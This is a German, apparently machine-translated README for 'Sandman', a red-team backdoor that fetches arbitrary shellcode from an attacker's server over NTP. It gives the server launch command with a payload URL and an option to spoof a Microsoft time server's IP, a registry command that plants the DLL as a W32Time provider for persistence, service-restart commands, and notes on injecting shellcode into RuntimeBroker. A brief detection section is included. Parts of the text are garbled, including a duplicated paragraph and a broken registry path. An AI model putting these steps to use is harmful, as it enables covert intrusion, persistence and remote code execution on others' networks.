Sandman

Sandman ist eine Hintertür, die während der Red -Team -Engagements an gehärteten Netzwerken arbeiten soll.

Sandman arbeitet als Stager und nutzt NTP (ein Protokoll zur Synchronisation von Zeit und Datum), um einen willkürlichen Shellcode von einem vordefinierten Server zu erhalten.

Da NTP ein Protokoll ist, das von vielen Verteidigern übersehen wird, was zu einer breiten Zugänglichkeit der Netzwerke führt.

Ausführen unter Windows / *Nix -Maschine:

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

• Netzwerkadapter: Der Adapter, den der Server anhören soll (z. B. Ethernet für Windows, ETH0 für *nix).

• Nutzlast -URL: Die URL zu Ihrem Shellcode könnte Ihr Agent (z. B. Cobaltstrike oder Meterpreter) oder ein anderer Stager sein.

• IP zu Parodie: Wenn Sie eine legitime IP -Adresse fälschen möchten (z. B. time.microsoft.coms IP -Adresse).

Zu Beginn können Sie die Sandmanbackdoor wie unten erwähnt kompilieren, da es sich um eine einzelne leichte C# ausführbare Datei handelt.

Um es zu verwenden, müssen Sie einfache Schritte befolgen:

• Fügen Sie den folgenden Registrierungswert hinzu:

 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "

• Starten Sie den W32Time -Service neu:

 sc stop w32time
sc start w32time

Hinweis: Stellen Sie sicher, dass Sie mit der X64 -Option zusammenstellen und keine CPU -Option!

• Erhalten und Ausführen einer willkürlichen Nutzlast vom kontrollierten Server eines Angreifers.

• Kann an gehärteten Netzwerken arbeiten, da NTP normalerweise in FW erlaubt ist.

• Imitieren eines legitimen NTP -Servers über IP -Spoofing.

• Python 3.9

• Die Anforderungen werden in der Anforderungen Datei angegeben.

Um die Backdoor zu kompilieren, habe ich Visual Studio 2022 verwendet, aber wie im Nutzungsabschnitt erwähnt, kann sie sowohl mit VS2022 als auch mit CSC zusammengestellt werden. Sie können es entweder mit dem Use_ShellCode kompilieren und den ShellCode von Orca oder ohne Gebrauch_ShellCode verwenden, um WebClient zu verwenden.

Um die Backdoor zu kompilieren, die ich Visual Studio 2022 verwendet habe, müssen Sie auch Dllexport (über Nuget oder andere Weise) installieren, um sie zu kompilieren. Sie können es entweder mit dem Use_ShellCode kompilieren und den ShellCode von Orca oder ohne Gebrauch_ShellCode verwenden, um WebClient zu verwenden.

• Ein Shellcode wird in RuntimeBroker injiziert.

• Die verdächtige NTP -Kommunikation beginnt mit einem bekannten magischen Header.

• Yara -Herrschaft.

• Orca für den Shellcode.

• Besonderer Dank geht an Tim McGuffin für die Zeitanbieteridee.

Vielen Dank an diejenigen, die bereits beigetragen haben, und ich werde gerne Beiträge annehmen, eine Pull -Anfrage stellen und ich werde sie überprüfen!